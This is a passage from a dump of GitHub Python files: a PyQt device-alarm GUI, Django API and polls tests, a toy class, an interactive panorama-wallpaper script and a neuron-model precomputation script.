str(self.Nrows))\n file.write(self.toSave)\n file.close()\n self.bottomlabel.setText(\"Configuration saved to file.\")\n self.bottomlabel.setToolTip(\"Saved configuation to file: \"+nameoffile)\n\n def loadbtnclicked(self):\n nameoffile = QtGui.QFileDialog.getOpenFileName(self, 'Load File')\n if not nameoffile:\n self.bottomlabel.setText(\"Cancelled loading configuration.\")\n else:\n self.loadfile(nameoffile,0)\n\n def loadfile(self,nameoffile,inp2):\n file = open(nameoffile, 'r')\n splitToLoad = file.read()\n splitToLoad = splitToLoad.split(\"##IamYourSeparator##\")\n identifier = splitToLoad[0].split('\\n')\n while(\"\" in identifier): # Get rid of empty strings\n identifier.remove(\"\")\n if identifier[0] == 'IamaDynaGUIalarmFile':\n try:\n if inp2 == 0:\n # Destroy the current buttons.\n self.killdynamicbuttongroup()\n devdoms = splitToLoad[1].split(\"\\n\")\n while(\"\" in devdoms): # Get rid of empty strings\n devdoms.remove(\"\")\n devdesc = splitToLoad[2].split(\"\\n\")\n while(\"\" in devdesc): # Get rid of empty strings\n devdesc.remove(\"\")\n devlims = splitToLoad[3].split(\"\\n\")\n while(\"\" in devlims): # Get rid of empty strings\n devlims.remove(\"\")\n devvlims = [float(i) for i in devlims]\n Nrows = float(splitToLoad[4].split(\"\\n\")[1])\n self.devdoms = devdoms\n self.devdesc = devdesc\n self.devlims = devvlims\n self.Nrows = float(Nrows)\n # All buttons are gone, so lets construct the new buttons.\n self.getallDevs()\n # The layout should be minimal, so make it unrealistically small (x=10, y=10 [px]) and then resize to minimum.\n self.resize(10,10)\n self.resize(self.sizeHint().width(), self.sizeHint().height())\n self.bottomlabel.setToolTip(\"Loaded configuration from file: \"+nameoffile)\n except:\n if inp2 == 0:\n self.bottomlabel.setText(\"Conf. 
file error: Missing separator(s).\")\n else:\n if inp2 == 0:\n self.bottomlabel.setText(\"Not a DynaGUI alarm file - missing identifier.\")\n\n def killdynamicbuttongroup(self):\n # Destroy / kill all buttons currently constructed in the buttongroup.\n for i in reversed(range(self.sublayout.count())):\n item = self.sublayout.itemAt(i)\n if isinstance(item, QtGui.QWidgetItem):\n item.widget().close()\n for item in self.groupBox.findChildren(QtGui.QLineEdit):\n self.sublayout.removeWidget(item)\n item.deleteLater()\n for item in self.groupBox.findChildren(QtGui.QCheckBox):\n self.sublayout.removeWidget(item)\n item.deleteLater()\n for item in self.groupBox.findChildren(QtGui.QLabel):\n self.sublayout.removeWidget(item)\n item.deleteLater()\n\n\n def getallDevs(self):\n rowcount = -1\n colcount = 0\n\n # Here the construction begins for all the checkboxes, and we make them all belong to the groupbox.\n for numm, index in enumerate(self.devdesc):\n rowcount += 1\n button = QtGui.QCheckBox(index, self.groupBox)\n button.setToolTip(self.devdoms[numm])\n try:\n textbox = QtGui.QLineEdit(str(self.devlims[numm]), self.groupBox)\n except:\n textbox = QtGui.QLineEdit(str(0), self.groupBox)\n self.devlims.append(0)\n textbox.setValidator(self.doublevalidator)\n combobox = QtGui.QComboBox(self.groupBox)\n combobox.addItem(\"<\")\n combobox.addItem(\">\")\n\n textbox.setEnabled(True)\n textbox.textChanged.connect(partial(self.lineeditedited,textbox))\n label = QtGui.QLabel(\"-\",self.groupBox)\n self.sublayout.addWidget(button,rowcount,colcount,1,1)\n self.sublayout.addWidget(label,rowcount,colcount+1,1,1)\n self.sublayout.addWidget(combobox,rowcount,colcount+2,1,1)\n self.sublayout.addWidget(textbox,rowcount,colcount+3,1,1)\n if rowcount == self.Nrows - 1:\n rowcount = -1\n colcount += 4\n\n # Here we construct the buttongroup.\n self.buttonGroup = QtGui.QButtonGroup(self)\n\n # Here we add all buttons to the buttongroup.\n for button in self.groupBox.findChildren(QtGui.QPushButton):\n if self.buttonGroup.id(button) < 0:\n self.buttonGroup.addButton(button)\n\n # Get the statuses\n self.statuscheck()\n\n def lineeditedited(self,lineedit):\n n = -1\n for item in self.groupBox.findChildren(QtGui.QLineEdit):\n n += 1\n if lineedit is item:\n self.devlims[n] = item.text()\n\n def startstopclicked(self):\n if self.timer.isActive():\n self.timer.stop()\n self.startstopbtn.setText(\"Not running. Press to activate.\")\n self.startstopbtn.setStyleSheet('QPushButton {background-color: maroon; color: white}')\n else:\n self.alarmflag = 0\n self.statuscheck()\n self.timer.start(self.timerinterval * 1000)\n self.startstopbtn.setText(\"Running. 
Press to deactivate.\")\n            if platform.system() == \"Linux\":\n                self.startstopbtn.setStyleSheet('QPushButton {background-color: lime; color: white}')\n            elif platform.system() == \"Darwin\":\n                self.startstopbtn.setStyleSheet('QPushButton {background-color: green; color: white}')\n            else:\n                self.startstopbtn.setStyleSheet('QPushButton {background-color: lime; color: white}')\n\n    def clock(self):\n        print(\"tic-tac\")\n\n    def statuscheck(self):\n        checkboxes = self.groupBox.findChildren(QtGui.QCheckBox)\n        lineedits = self.groupBox.findChildren(QtGui.QLineEdit)\n        labels = self.groupBox.findChildren(QtGui.QLabel)\n        combos = self.groupBox.findChildren(QtGui.QComboBox)\n        alarmstring = 0\n        for ind, item in enumerate(checkboxes):\n            splitt = str(item.toolTip()).split(\"/\")\n            attr = splitt[len(splitt)-1]\n            proxy = str(\"/\".join(splitt[0:len(splitt)-1]))\n\n            if self.ctrl_library == \"Tango\":\n                prox = [PT.DeviceProxy(str(proxy))]\n                for bd in prox:\n                    val = bd.read_attribute(attr).value\n            elif self.ctrl_library == \"Randomizer\":\n                val = random.random()\n            lorm = str(combos[ind].currentText())\n            labels[ind].setText(str(val))\n            if item.isChecked():\n                if lorm == \"<\":\n                    if val > float(lineedits[ind].text()):\n                        if alarmstring == 0:\n                            alarmstring = str(item.text())\n                        else:\n                            alarmstring = str(alarmstring + \" [[slnc 200]] and [[slnc 200]] \" + str(item.text()))\n                        item.setStyleSheet(\"background-color: red\")\n                    else:\n                        if platform.system() == \"Linux\":\n                            item.setStyleSheet(\"background-color: lime\")\n                        elif platform.system() == \"Darwin\":\n                            item.setStyleSheet(\"background-color: green\")\n                        else:\n                            item.setStyleSheet('background-color: lime')\n\n                elif lorm == \">\":\n                    if val < float(lineedits[ind].text()):\n                        if alarmstring == 0:\n                            alarmstring = str(item.text())\n                        else:\n                            alarmstring = str(alarmstring + \" [[slnc 200]] and [[slnc 200]] \" + str(item.text()))\n                        item.setStyleSheet(\"background-color: red\")\n                    else:\n                        if platform.system() == \"Linux\":\n                            item.setStyleSheet(\"background-color: lime\")\n                        elif platform.system() == \"Darwin\":\n                            item.setStyleSheet(\"background-color: green\")\n                        else:\n                            item.setStyleSheet('background-color: lime')\n        if alarmstring == 0:\n            self.bottomlabel.setText(\"All clear.\")\n            self.alarmflag = 0\n        else:\n            if self.alarmflag == 0:\n                if platform.system() == \"Linux\":\n                    os.system('spd-say \"' + str(\"\".join(alarmstring.split(\"[[slnc 200]]\"))) + '[[slnc 200]] in alarm.\"')\n                elif platform.system() == \"Darwin\":\n                    os.system(\"say -v 'karen' \"+ alarmstring + '[[slnc 200]] in alarm.')\n                elif platform.system() == \"Windows\":\n                    print(\"Windows\")\n                self.alarmflag = 1\n            self.bottomlabel.setText(str(datetime.now().strftime(\"%Y-%b-%d_%H%M%S\")) + \", \" + str(\"\".join(alarmstring.split(\"[[slnc 200]]\")))+\" in alarm.\")\n\n    def listbtnclicked(self):\n        listGui = listbtnGUI(self)\n        listGui.setModal(True)\n        listGui.exec_()\n\n        if self.reloadflag == 1:\n            self.maxsize = 0\n            self.killdynamicbuttongroup()\n            self.getallDevs()\n\n            # The layout should be minimal, so make it unrealistically small (x=10, y=10 [px]) and then resize to minimum.\n            self.reloadflag = 0\n\n    def closeEvent(self, event):\n        self.timer.stop()\n\nclass listbtnGUI(QtGui.QDialog):\n    def __init__(self, parent = Dialog):\n        super(listbtnGUI, self).__init__(parent)\n        self.parent = parent\n        self.setWindowTitle(\"Edit DynaGUI Alarms\")\n        listgui = QtGui.QFormLayout(self)\n\n        devslbl = QtGui.QLabel(\"List of devices' server domains:\")\n        self.textboxDevs = QtGui.QPlainTextEdit('\\n'.join(parent.devdoms))\n\n        desclbl = QtGui.QLabel(\"List of devices' descriptions:\")\n        
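# descriptions are entered one per line, pairing with the domains on the left\n        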
self.textboxDesc = QtGui.QPlainTextEdit('\\n'.join(parent.devdesc))\n\n        rowslbl = QtGui.QLabel(\"Max. number of rows:\")\n        self.textboxRows = QtGui.QSpinBox()\n        self.textboxRows.setValue(parent.Nrows)\n\n        tmrlbl = QtGui.QLabel(\"Alarms timer [s]\")\n        self.textboxTmr = QtGui.QSpinBox()\n        self.textboxTmr.setValue(parent.timerinterval)\n\n        okbtn = QtGui.QPushButton('Ok')\n        nobtn = QtGui.QPushButton('Cancel')\n\n\n        listgui.addRow(devslbl,desclbl)\n        listgui.addRow(self.textboxDevs,self.textboxDesc)\n\n        listgui.addRow(rowslbl,self.textboxRows)\n\n        listgui.addRow(tmrlbl,self.textboxTmr)\n\n        listgui.addRow(okbtn, nobtn)\n        okbtn.clicked.connect(self.confirmfunc)\n        nobtn.clicked.connect(self.cancelfunc)\n\n\n        self.resize(self.sizeHint().width(), self.sizeHint().height())\n\n    def confirmfunc(self):\n        textDevs = str(self.textboxDevs.toPlainText())\n        textDescs = str(self.textboxDesc.toPlainText())\n        self.newlistDevs = textDevs.split()\n        self.newlistDescs = textDescs.split('\\n')\n\n        # Check if all devices have domain, description and limits defined:\n        if abs(len(self.newlistDevs)-len(self.newlistDescs)) == 0:\n            self.parent.timerinterval = self.textboxTmr.value()\n            if self.parent.devdoms != self.newlistDevs or self.parent.devdesc != self.newlistDescs:\n                self.parent.devdoms = self.newlistDevs\n                self.parent.devdesc = self.newlistDescs\n                self.parent.reloadflag = 1\n\n            if self.parent.Nrows != self.textboxRows.value():\n                self.parent.Nrows = self.textboxRows.value()\n                self.parent.reloadflag = 1\n            self.close()\n        else:\n            if platform.system() == \"Linux\":\n                os.system('spd-say \"NO NO NO\"')\n            elif platform.system() == \"Darwin\":\n                os.system(\"say -v 'karen' NO NO NO\")\n            elif platform.system() == \"Windows\":\n                print(\"Windows\")\n            QtGui.QMessageBox.warning(self,\"Error\",\"Number of domains and descriptions must be the same.\")\n\n\n    def cancelfunc(self):\n        self.close()\n\nif __name__ == '__main__':\n    # Read the optional CLI arguments defensively so a missing argument cannot\n    # leave ctrl_library undefined when it is compared below.\n    ctrl_library = sys.argv[1] if len(sys.argv) > 1 else \"\"\n    inp = sys.argv[2] if len(sys.argv) > 2 else 0\n    app = QtGui.QApplication(sys.argv)\n    goflag = 1\n    if ctrl_library == \"Tango\":\n        import PyTango as PT\n    elif ctrl_library == \"EPICS\":\n        print(\"Not yet implemented.\")\n        goflag = 0\n    elif ctrl_library == \"Randomizer\":\n        import random\n    else:\n        goflag = 0\n    if goflag == 1:\n        window = Dialog(inp,ctrl_library)\n        window.show()\n        sys.exit(app.exec_())\n","repo_name":"Chilipp/DynaGUI","sub_path":"dynagui-files/DynaGUI_Alarms.py","file_name":"DynaGUI_Alarms.py","file_ext":"py","file_size_in_byte":19243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"}
+{"seq_id":"71754022134","text":"from django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import Coverage\n\nfrom product.serializers import CoverageSerializer\n\n\nCOVERAGES_URL = reverse('product:coverage-list')\n\n\nclass PublicCoveragesApiTests(TestCase):\n    \"\"\"Test the publicly available Coverages API\"\"\"\n\n    def setUp(self):\n        self.client = APIClient()\n\n    def test_login_required(self):\n        \"\"\"Test that login is required for retrieving Coverages\"\"\"\n        res = self.client.get(COVERAGES_URL)\n\n        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateCoveragesApiTests(TestCase):\n    \"\"\"Test the authorized user coverages API\"\"\"\n\n    def setUp(self):\n        self.user = get_user_model().objects.create_user(\n            '4086432477',\n            'testpass'\n        )\n        self.client = APIClient()\n        
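# NOTE: force_authenticate() marks every request from this test client as coming\n        # from self.user, bypassing real token/session login; it is the standard DRF test\n        # shortcut. A hypothetical token-based alternative (not used in this suite) would be:\n        #   token = Token.objects.create(user=self.user)  # rest_framework.authtoken.models.Token\n        #   self.client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)\n        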
self.client.force_authenticate(self.user)\n\n def test_retrieve_coverages(self):\n \"\"\"Test retrieving coverages\"\"\"\n Coverage.objects.create(user=self.user, name='insurance')\n Coverage.objects.create(user=self.user, name='warranty')\n\n res = self.client.get(COVERAGES_URL)\n\n coverages = Coverage.objects.all().order_by('-name')\n serializer = CoverageSerializer(coverages, many=True)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)\n\n def test_coverages_limited_to_user(self):\n \"\"\"Test that coverages returned are for the authenticated user\"\"\"\n user2 = get_user_model().objects.create_user(\n '4086432478',\n 'testpass'\n )\n Coverage.objects.create(user=user2, name='insurance')\n coverage = Coverage.objects.create(user=self.user, name='warranty')\n\n res = self.client.get(COVERAGES_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], coverage.name)\n\n def test_create_coverage_successful(self):\n \"\"\"Test creating a new coverage\"\"\"\n payload = {'name': 'Test coverage'}\n self.client.post(COVERAGES_URL, payload)\n\n exists = Coverage.objects.filter(\n user=self.user,\n name=payload['name']\n ).exists()\n self.assertTrue(exists)\n\n def test_create_coverage_invalid(self):\n \"\"\"Test creating a new coverage with invalid payload\"\"\"\n payload = {'name': ''}\n res = self.client.post(COVERAGES_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n","repo_name":"greatPurpose/pybackend","sub_path":"app/product/tests/test_coverages_api.py","file_name":"test_coverages_api.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70799510454","text":"# Create your tests here.\nfrom django.test import TestCase\nimport datetime \nfrom django.utils import timezone\nfrom .models import Question\nfrom django.urls import reverse\n\nclass QuestionModelTest(TestCase):\n def test_was_published_recently_with_future_question(self):\n time = timezone.now() + datetime.timedelta(days=30)\n future_question = Question(pub_date=time)\n self.assertIs(future_question.was_published_recently(), False)\n\n def test_was_published_recently_with_old_question(self):\n time = timezone.now() - datetime.timedelta(days=1, seconds=1)\n old_question = Question(pub_date=time)\n self.assertIs(old_question.was_published_recently(), False)\n \n def test_was_published_recently_with_recent_question(self):\n time = timezone.now() - datetime.timedelta(hours=23, minutes=59, seconds=59)\n recent_question = Question(pub_date=time)\n self.assertIs(recent_question.was_published_recently(), True)\n\n#esta funcion externa va a ser utilizada en las funciones de la siguient Test Class\ndef create_question(texto_pregunta, dias):\n time = timezone.now() + datetime.timedelta(days=dias)\n return Question.objects.create(question_text=texto_pregunta, pub_date=time)\n\nclass QuestionIndexViewTests(TestCase):\n def test_no_questions(self):\n #if no questions exist, an appropriate message will be displayed\n respuesta = self.client.get(reverse('polls:indice'))\n self.assertEqual(respuesta.status_code, 200)\n self.assertContains(respuesta, 'No polls are available.')\n self.assertQuerysetEqual(respuesta.context['lista_ultimas_preguntas'], [])\n \n def test_past_question(self):\n \"\"\" Questions with a pub_date in the past are displayed on the index page. 
\"\"\"\n pregunta = create_question(texto_pregunta='Past question', dias=-30)\n respuesta = self.client.get(reverse('polls:indice'))\n self.assertQuerysetEqual(respuesta.context['lista_ultimas_preguntas'], [pregunta])\n\n def test_future_question(self):\n \"\"\" Questions with a pub_date in the future arent displayed on the index page \"\"\"\n create_question(texto_pregunta='Future question', dias=30)\n respuesta = self.client.get(reverse('polls:indice'))\n self.assertContains(respuesta, 'No polls are available.')\n self.assertQuerysetEqual(respuesta.context['lista_ultimas_preguntas'], [])\n\n def test_future_question_and_past_question(self):\n \"\"\" Even if past and future questions exist, just the past ones will be displayed. \"\"\"\n pregunta = create_question(texto_pregunta='Past question', dias=-30)\n create_question(texto_pregunta='Future question', dias=30)\n respuesta = self.client.get(reverse('polls:indice'))\n self.assertQuerysetEqual(respuesta.context['lista_ultimas_preguntas'], [pregunta])\n\n def test_two_past_questions(self):\n \"\"\" The question index page may display multiple questions \"\"\"\n pregunta1 = create_question(texto_pregunta='Past question 1', dias=-30)\n pregunta2 = create_question(texto_pregunta='Past question 2', dias=-5)\n respuesta = self.client.get(reverse('polls:indice'))\n self.assertQuerysetEqual(respuesta.content['lista_ultimas_preguntas'], [pregunta1, pregunta2])\n\n#TESTS PARA EL DETAIL VIEW\nclass QuestionDetailViewTests(TestCase):\n def test_future_question(self):\n \"\"\" the detail view of a question with a pub_date in the future\n returns a 404 not found \"\"\"\n pregunta_futuro = create_question(texto_pregunta='Pregunta futura.', dias=5)\n url = reverse('polls:detalle', args=(pregunta_futuro.id))\n respuesta = self.client.get(url)\n self.assertEqual(respuesta.status_code, 404)\n\n def test_past_question(self):\n \"\"\" \n The detail view of a question with a pub_date in the past\n displays the question text\n \"\"\"\n pregunta_pasado = create_question(texto_pregunta='Pregunta pasado', dias=-5)\n url = reverse('polls:detalle', args=(pregunta_pasado.id))\n respuesta = self.client.get(url)\n self.assertContains(respuesta, pregunta_pasado.question_text)\n ","repo_name":"xpsylon/ProjectTwo","sub_path":"polls/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22865734761","text":"class Phone:\n name = ''\n memory = ''\n ram = 0\n d = ''\n type = ''\n iphone = ''\n\n def __init__(self):\n print(f\"Created objects of phone:\")\n self.name = \"Optimus Primigga\"\n self.memory = '128GB'\n self.ram = 68\n self.d = '156'\n self.type = 'gaming'\n self.iphone = \"!!!!NOT N O T NEVER!!!!\"\n\n\n def ShowOn(self):\n print(f\"name: {self.name} \\nmemory: {self.memory} \\ndiagonal: {self.d} \\ntype: {self.type} \\nRAM: {self.ram} \\nIphone?: {self.iphone}\")\n def __del__(self):\n print(\"Deleted objects of phone\")\n\nif __name__ == '__main__':\n phone = Phone()\n phone.ShowOn()\n del phone","repo_name":"k2supra/Collector_Python","sub_path":"Classes/ex_3/ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74854442611","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWebEngineWidgets import *\n\nimport time\nimport mouse\nimport win32gui as 
win32\nfrom pynput import mouse as MMFOOD\nfrom multiprocessing import Process\nfrom wallpaper import getShell\nfrom multiprocessing import set_start_method\nfrom bytesp import saveBytesToCode\n\n\nmousedown = False\nmouseDragX = 0\nmouseDragY = 0\nnumMouseDrag = 0\nmx = 0\nmy = 0\nchecking = 0\nbrowser = None\n\nclass MouseMovement:\n    def __init__(self, x, y):\n        self.x = x\n        self.y = y\n\n\n\ndef hi(s):\n    try:\n        global desktop\n        global checking\n\n        checking += 1\n        if checking > 15:\n            with open(\"hwnd\", \"r\") as f:\n                desktop = int(f.read())\n\n\n        if win32.GetForegroundWindow() == desktop:\n            global mousedown\n            if hasattr(s, \"event_type\"):\n                if s.event_type == \"down\" or s.event_type == \"double\":\n                    mousedown = True\n                if s.event_type == \"up\":\n                    mousedown = False\n                    global mx\n                    global my\n                    mx = 0\n                    my = 0\n            if hasattr(s, \"x\") and mousedown:\n                movethething(s)\n    except Exception:\n        # early hook calls can arrive before the \"hwnd\" file or the desktop handle exists\n        print(\"Variable not defined yet\")\n\n\ndef sendMessage(cx, cy):\n    #thing.browser.page().runJavaScript(\"window.alert('i want to run window.movealittlebitsomewhere(\"+str(cx)+\", \"+str(cy)+\")')\")\n    global browser\n    if browser is not None:\n        browser.page().runJavaScript(\"window.movealittlebitsomewhere(\"+str(cx)+\", \"+str(cy)+\")\")\n\ndef sendIWANTTOSCROLLLL(dy):\n    global browser\n    browser.page().runJavaScript(\"window.LEMMESCROLLLLLLL(\"+str(dy)+\")\")\n\ndef on_scroll(x, y, dx, dy):\n    #print(dy)\n    if dy != 0 and win32.GetForegroundWindow() == desktop and browser is not None:\n        sendIWANTTOSCROLLLL(dy)\n\ndef start_scroll_listener():\n    listener = MMFOOD.Listener(\n        on_scroll=on_scroll)\n    listener.start()\n\n\ndef movethething(s):\n    global my\n    global mx\n    x = getattr(s, \"x\")\n    y = getattr(s, \"y\")\n    if mx == 0 or my == 0:\n        mx = x\n        my = y\n\n    cx = x - mx\n    cy = y - my\n    sendMessage(cx, cy)\n\n    mx = x\n    my = y\n\n    \n    \n\nclass MyWebBrowser(QMainWindow):\n    def __init__(self, *args, **kwargs):\n        super(MyWebBrowser, self).__init__(*args, **kwargs)\n        self.window = QWidget()\n        self.window.setWindowTitle(\"Image\")\n        self.window.setWindowFlag(Qt.FramelessWindowHint)\n\n        self.layout = QVBoxLayout()\n\n        self.browser = QWebEngineView()\n\n        self.layout.addWidget(self.browser)\n\n        self.browser.setUrl(QUrl(\"file:///C:/Users/ms_al/actual%20project/photosphere%20panorama%20street%20view%20360/web/index.html\"))\n\n\n        self.window.setLayout(self.layout)\n        self.window.show()\n\n        start_scroll_listener()\n        mouse.hook(hi)\n        self.browser.page().runJavaScript(\"window.alert('hi plonkit')\")\n\n\n    def browser_self(self):\n        return self.browser\n\n    \n\n\n\ndef startWebBrowser():\n    global browser\n    app = QApplication([])\n    window = MyWebBrowser()\n    browser = window.browser_self()\n    app.exec_()\n\ndef sendWindowDesktop():\n    time.sleep(2)\n    getShell()\n\n\n    \n\n#startWebBrowser()\n\nif __name__ == \"__main__\":\n    bytes_path = \"web/bytes.js\"\n    pano_path = \"web/guyinhouselmao.jpg\"\n\n    saveBytesToCode(bytes_path, pano_path)\n\n    set_start_method('spawn')\n\n    desktop = 0\n\n    p_wb = Process(target=startWebBrowser)\n    p_window = Process(target=sendWindowDesktop)\n\n    p_wb.start()\n    p_window.start()\n\n    p_wb.join()\n    p_window.join()\n","repo_name":"Letti42/geoguessr-live-wallpaper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"31748461865","text":"# -*- coding: utf-8 -*-\n\n# script for computing the steady-state, and the first order rate response \n# of an exponential integrate-and-fire neuron subject to white 
noise input\n# to modulations of the input moments and associated quantities \n# for linear-nonlinear cascade rate models, on a rectangle of baseline \n# input moments (mu, sigma) -- written by Josef Ladenbauer in 2016 \n\n# use the following in IPython for qt plots: %matplotlib qt\n\nfrom params import get_params\nimport cascade_precalc_functions as cf\nimport numpy as np\nfrom collections import OrderedDict\nimport os\n\nfolder = os.path.dirname(os.path.realpath(__file__)) # store files in the same directory as the script itself\noutput_filename = 'EIF_output_for_cascade_noref_speedtest.h5'\nquantities_filename = 'quantities_cascade_noref_speedtest.h5'\n#quantities_filename = 'quantities_cascade_noref_TEMP2.h5' # contains also sigmod dosc fits\nload_EIF_output = False\nload_quantities = False\ncompute_EIF_output = True\ncompute_quantities = True\nsave_rate_mod = False\nsave_EIF_output = True\nsave_quantities = True\nplot_filters = False\nplot_quantities = False\n\n# TODO: recalc output and quantities with 241x46 grid (instead of 261x46) and save: \n# done for Tref=0 (w/o LN_bexdos)\n\n# PREPARING --------------------------------------------------------------------\nparams = get_params()\n\nparams['t_ref'] = 0.0\n\nN_mu_vals = 241 #def.: 261 mu grid points -- from -1.5 to 5 with spacing 0.025 \nN_sigma_vals = 46 #def.: 46 #sigma grid points -- from 0.5 to 5 with spacing 0.1\n\nd_freq = 0.25 # Hz, def.: 0.25\nd_V = 0.01 # mV note: Vr should be a grid point\n\n# For Tref<=1.5 the following limits are reasonable:\nmu_vals = np.linspace(-1.0, 5.0, N_mu_vals) #def.: np.linspace(-1.0, 5.0, N_mu_vals)\nsigma_vals = np.linspace(0.5, 5.0, N_sigma_vals) #def.: np.linspace(0.5, 5.0, N_sigma_vals)\n# EIF_steadystate_and_linresponse results are not faithful for sigma<0.5 and \n# for mu<-1 when sigma is small (sigma=0.5) \n# --> this may be improved by using a slight refinement in the backwards integration:\n# using evaluations of V at k-1/2 instead of k (current version), which would match then \n# with the spectral calculation scheme and (therefore) should work better for smaller mu \n\n# choose background mu and sigma values for filter visualization \n#num_mus_plot = np.min([np.size(mu_vals),8]) \n#mus_plot = np.linspace(mu_vals[0], mu_vals[-1], num_mus_plot) \n#mus_plot = [-0.5, 0.0, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0]\n# for paper: mu-mod [-0.5, 1.5, 3.0], sigma-mod [-0.5, 0.0, 1.5]\nmus_plot = [-0.5, 1.5, 3.0]\n#num_sigmas_plot = np.min([np.size(sigma_vals),4]) \n#sigmas_plot = np.linspace(sigma_vals[0], sigma_vals[-1], num_sigmas_plot) \nsigmas_plot = [1.5, 3.5] #[1.2, 2.4, 3.6] #[0.5, 1.5, 2.5, 3.5] \n# choose background sigma values for quantity visualization \nsigmas_quant_plot = np.arange(0.5, 4.501, 0.2) #[0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0]\n#sigmas_quant_plot = sigma_vals \n\n# some more precalc parameters\nparams['N_procs'] = 10 #multiprocessing.cpu_count() # no of parallel processes (not used in calc_cascade_quantities)\nparams['V_vals'] = np.arange(params['Vlb'],params['Vcut']+d_V/2,d_V)\nparams['freq_vals'] = np.arange(d_freq, 1000+d_freq/2, d_freq)/1000 # kHz\nparams['d_mu'] = 1e-5 # mV/ms\nparams['d_sigma'] = 1e-5 # mV/sqrt(ms)\n\nEIF_output_dict = OrderedDict()\nLN_quantities_dict = OrderedDict()\n\nEIF_output_names = ['r_ss', 'dr_ss_dmu', 'dr_ss_dsigma', 'V_mean_ss',\n 'r1_mumod', 'r1_sigmamod', \n #'peak_abs_r1_mumod', 'f_peak_abs_r1_mumod', #not needed and not impl. 
a.t.m.\n 'peak_real_r1_mumod', 'f_peak_real_r1_mumod', \n 'peak_imag_r1_mumod', 'f_peak_imag_r1_mumod']\n #'peak_real_r1_sigmamod', 'f_peak_real_r1_sigmamod', #not needed\n #'peak_imag_r1_sigmamod', 'f_peak_imag_r1_sigmamod'] #not needed\nLN_quantity_names = ['r_ss', 'V_mean_ss', \n 'tau_mu_exp', 'tau_sigma_exp',\n 'tau_mu_dosc', 'f0_mu_dosc']\n #'tau_sigma_dosc', 'f0_sigma_dosc'] #not needed\n #'B_mu_bedosc', 'tau1_mu_bedosc', 'tau2_mu_bedosc', 'f0_mu_bedosc'] #not needed\n\nplot_EIF_output_names = ['r1_mumod', 'ifft_r1_mumod', 'r1_sigmamod', 'ifft_r1_sigmamod'] \nplot_quantitiy_names = ['r_ss', 'V_mean_ss']#,\n #'tau_mu_exp', 'tau_sigma_exp',\n #'tau_mu_dosc', 'f0_mu_dosc']\n #'tau_sigma_dosc', 'f0_sigma_dosc'] #not needed\n #'B_mu_bedosc', 'tau1_mu_bedosc', 'tau2_mu_bedosc', 'f0_mu_bedosc'] #not needed\n\nif __name__ == '__main__':\n\n # LOADING ----------------------------------------------------------------------\n if load_EIF_output:\n cf.load(folder+'/'+output_filename, EIF_output_dict,\n EIF_output_names + ['mu_vals', 'sigma_vals', 'freq_vals'], params)\n # optional shortcuts\n mu_vals = EIF_output_dict['mu_vals']\n sigma_vals = EIF_output_dict['sigma_vals']\n freq_vals = EIF_output_dict['freq_vals'] \n \n if load_quantities:\n cf.load(folder+'/'+quantities_filename, LN_quantities_dict,\n LN_quantity_names + ['mu_vals', 'sigma_vals', 'freq_vals'], params)\n # optional shortcuts\n mu_vals = LN_quantities_dict['mu_vals']\n sigma_vals = LN_quantities_dict['sigma_vals']\n freq_vals = LN_quantities_dict['freq_vals'] \n \n #print params['t_ref'] #TEMP\n \n # COMPUTING --------------------------------------------------------------------\n# if compute_EIF_output: \n# EIF_output_dict = cf.EIF_steadystate_and_linresponse(mu_vals,sigma_vals,params,\n# EIF_output_dict,EIF_output_names)\n# \n# \n# if compute_quantities: \n# LN_quantities_dict = cf.calc_cascade_quantities(mu_vals,sigma_vals,params,\n# EIF_output_dict,LN_quantities_dict,\n# LN_quantity_names)\n# # takes a few minutes (~10 for single proc.)\n \n # NEW: combined EIF_steadystate_and_linresponse and calc_cascade_quantities, \n # calculate all mu_vals per process and opt for not storing rate responses (filters)\n # in order to save memory! \n if compute_EIF_output and compute_quantities:\n EIF_output_dict, LN_quantities_dict = cf.calc_EIF_output_and_cascade_quants(\n mu_vals, sigma_vals, params, \n EIF_output_dict, EIF_output_names, save_rate_mod,\n LN_quantities_dict, LN_quantity_names) \n # takes 40 min. for default mu,sigma,freq grid and N_procs=8 (risha)\n # takes ~125 min. 
for default mu,sigma,freq grid and N_procs=2 (lenovo laptop)\n # takes 1 h for default mu,sigma,freq grid and N_procs=10 (merope) \n \n # SAVING ----------------------------------------------------------------------- \n if save_EIF_output:\n cf.save(folder+'/'+output_filename, EIF_output_dict, params) \n print('saving EIF output done')\n \n if save_quantities:\n cf.save(folder+'/'+quantities_filename, LN_quantities_dict, params) \n print('saving LN quantities done')\n \n # PLOTTING ---------------------------------------------------------------------\n if plot_filters:\n recalc_filters = True\n cf.plot_filters(EIF_output_dict, LN_quantities_dict, plot_EIF_output_names, \n params, mus_plot, sigmas_plot, recalc_filters)\n \n if plot_quantities: \n # cf.plot_quantities(LN_quantities_dict, plot_quantitiy_names, sigmas_quant_plot)\n cf.plot_quantities_forpaper(LN_quantities_dict, plot_quantitiy_names, \n sigmas_quant_plot, mus_plot, sigmas_plot)\n \n\nplot_addon_fabian = False\nif plot_addon_fabian:\n 